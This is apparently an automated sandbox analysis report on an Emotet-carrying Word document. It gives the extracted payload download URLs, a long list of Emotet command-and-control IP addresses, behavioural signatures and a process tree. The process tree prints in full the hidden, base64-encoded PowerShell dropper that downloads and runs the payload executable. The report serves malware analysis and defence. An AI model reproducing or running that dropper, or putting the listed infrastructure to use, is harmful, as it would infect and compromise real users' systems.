Analysis
-
max time kernel
29s -
resource
win10v191014 -
submitted
17-01-2020 12:24
General
Malware Config
Extracted
http://friendzonecafe.com/cgi-bin/JNjiKG/
http://www.jalanuang.com/wp-content/wfwwwTbw/
http://erfanpich.com/wp-includes/iCWesb/
https://myevol.biz/office365/JypsIM/
http://aminanchondo.com/wp-admin/qdedi66f4-ts7-841192/
Extracted
emotet
177.103.240.93:80
197.94.32.129:8080
58.92.179.55:443
124.150.175.133:80
143.95.101.72:8080
91.205.173.150:8080
69.30.205.162:7080
125.209.114.180:443
78.210.132.35:80
112.186.195.176:80
183.87.40.21:8080
91.83.93.103:443
66.229.161.86:443
114.179.127.48:80
41.77.74.214:443
122.19.63.27:80
50.116.78.109:8080
200.82.88.254:80
42.51.192.231:8080
160.119.153.20:80
187.177.155.123:990
69.14.208.221:80
203.124.57.50:80
91.73.169.210:80
37.59.24.25:8080
122.176.116.57:443
81.82.247.216:80
61.221.152.140:80
23.253.207.142:8080
144.139.91.187:80
105.209.235.113:8080
78.189.60.109:443
180.16.248.25:80
88.247.26.78:80
85.100.122.211:80
50.63.13.135:8080
41.215.79.182:80
78.46.87.133:8080
1.217.126.11:443
190.93.210.113:80
179.5.118.12:8080
163.172.107.70:8080
165.255.142.118:80
220.247.70.174:80
75.86.6.174:80
185.244.167.25:443
211.229.116.130:80
95.130.37.244:443
5.178.245.100:80
76.87.58.38:80
216.75.37.196:8080
95.216.207.86:7080
182.176.116.139:995
190.201.144.85:7080
98.178.241.106:80
190.171.153.139:80
210.111.160.220:80
82.79.244.92:80
67.254.196.78:443
192.241.220.183:8080
182.187.137.199:8080
82.145.43.153:8080
5.196.200.208:8080
196.6.119.137:80
201.183.251.100:80
46.17.6.116:8080
70.45.30.28:80
41.185.29.128:8080
91.117.31.181:80
186.223.86.136:443
14.161.30.33:443
190.5.162.204:80
78.101.95.172:80
192.210.217.94:8080
181.39.96.86:443
87.9.181.247:80
75.127.14.170:8080
110.2.118.164:80
181.196.27.123:80
211.20.154.102:80
76.11.76.47:80
142.93.87.198:8080
78.188.170.128:80
186.147.245.204:80
106.248.79.174:80
149.202.153.251:8080
212.129.14.27:8080
51.77.113.97:8080
203.153.216.178:7080
183.91.3.63:80
212.112.113.235:80
139.59.12.63:8080
156.155.163.232:80
162.144.46.90:8080
177.144.130.105:443
51.38.134.203:8080
88.249.181.198:443
91.117.131.122:80
186.84.173.136:8080
82.146.55.23:7080
192.241.241.221:443
187.72.47.161:443
78.186.102.195:80
183.82.123.60:443
85.109.190.235:443
61.204.119.188:443
24.141.12.228:80
37.70.131.107:80
78.189.165.52:8080
195.201.56.70:8080
60.152.212.149:80
190.17.94.108:443
76.185.136.132:80
88.247.53.159:443
95.216.212.157:8080
160.226.171.255:443
37.46.129.215:8080
176.58.93.123:80
80.211.32.88:8080
172.104.70.207:8080
157.7.164.178:8081
217.12.70.226:80
181.53.29.136:8080
46.32.229.152:8080
124.150.175.129:8080
158.69.167.246:8080
60.130.173.117:80
Signatures
-
Drops file in System32 directory 1 IoCs
Processes:
978.exedescription ioc process File renamed C:\Users\Admin\978.exe => C:\Windows\SysWOW64\publishmalert.exe 978.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE978.exe978.exepid process 4956 WINWORD.EXE 4752 978.exe 4732 978.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 3684 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe978.exedescription pid process target process PID 3684 wrote to memory of 4752 3684 Powershell.exe 978.exe PID 4752 wrote to memory of 4732 4752 978.exe 978.exe -
Executes dropped EXE 2 IoCs
Processes:
978.exe978.exepid process 4752 978.exe 4732 978.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
978.exepid process 4732 978.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4956 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3684 5020 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 3684 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fb4eb20a88f40b3879d636e628d900f8cc7725d7029eb535b7144117fe9a079c.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:4956
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABZAG0AdgB3AGgAbQB0AHYAZwBrAD0AJwBCAGwAagByAGMAeQBtAHIAYwBsAGoAJwA7ACQATgBmAG0AdQBmAHYAYwBtAGgAYgBrAHEAcQAgAD0AIAAnADkANwA4ACcAOwAkAEIAZABiAHAAagBoAHAAagBpAD0AJwBOAGIAbQB1AGoAZwBrAGkAJwA7ACQAQwB6AHoAeABpAHMAaAB5AHgAagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBmAG0AdQBmAHYAYwBtAGgAYgBrAHEAcQArACcALgBlAHgAZQAnADsAJABCAHkAawBoAHIAZABjAGcAPQAnAFYAdABjAGsAcQB1AHEAYQAnADsAJABBAHQAeABmAG8AcQB3AHkAYgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgBXAGUAQgBjAEwAaQBlAG4AdAA7ACQAWABxAGEAdQBvAGIAZQB5AGcAawB1AHkAPQAnAGgAdAB0AHAAOgAvAC8AZgByAGkAZQBuAGQAegBvAG4AZQBjAGEAZgBlAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ASgBOAGoAaQBLAEcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBqAGEAbABhAG4AdQBhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHcAZgB3AHcAdwBUAGIAdwAvACoAaAB0AHQAcAA6AC8ALwBlAHIAZgBhAG4AcABpAGMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaQBDAFcAZQBzAGIALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHkAZQB2AG8AbAAuAGIAaQB6AC8AbwBmAGYAaQBjAGUAMwA2ADUALwBKAHkAcABzAEkATQAvACoAaAB0AHQAcAA6AC8ALwBhAG0AaQBuAGEAbgBjAGgAbwBuAGQAbwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcQBkAGUAZABpADYANgBmADQALQB0AHMANwAtADgANAAxADEAOQAyAC8AJwAuACIAUwBgAFAAbABpAHQAIgAoACcAKgAnACkAOwAkAFMAZAB3AHAAcAB4AHoAeAA9ACcAWgBxAHgAZABhAGYAcgBpAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEgAbwBtAGgAbABmAGkAeQBlAGYAeABoACAAaQBuACAAJABYAHEAYQB1AG8AYgBlAHkAZwBrAHUAeQApAHsAdAByAHkAewAkAEEAdAB4AGYAbwBxAHcAeQBiAC4AIgBkAG8AVwBuAGwATwBgAEEAZABGAGAASQBgAGwARQAiACgAJABIAG8AbQBoAGwAZgBpAHkAZQBmAHgAaAAsACAAJABDAHoAegB4AGkAcwBoAHkAeABqACkAOwAkAEMAdQBqAGcAdAB6AGMAZABvAHAAagA9ACcASAB5AGIAdQBzAHUAZABlAG0AJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDAHoAegB4AGkAcwBoAHkAeABqACkALgAiAEwARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgA2ADIAMQA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgBUACIAKAAkAEMAegB6AHgAaQBzAGgAeQB4AGoAKQA7ACQAVwB5AGsAbABkAGkAaQBsAG4APQAnAE0AagB2AHgAeAB0AGUAcQBwACcAOwBiAHIAZQBhAGsAOwAkAFYAYgBkAHcAcAB5AGEAaQBwAG0AZwBhAD0AJwBSAHMAbABnAGIAaABxAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATAB3AHcAZgBrAGkAcwBuAGgAZABjAD0AJwBIAHQAagBsAGYAYQB2AGYAaQAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:3684 -
C:\Users\Admin\978.exe"C:\Users\Admin\978.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4752 -
C:\Users\Admin\978.exe--5a8252d83⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4732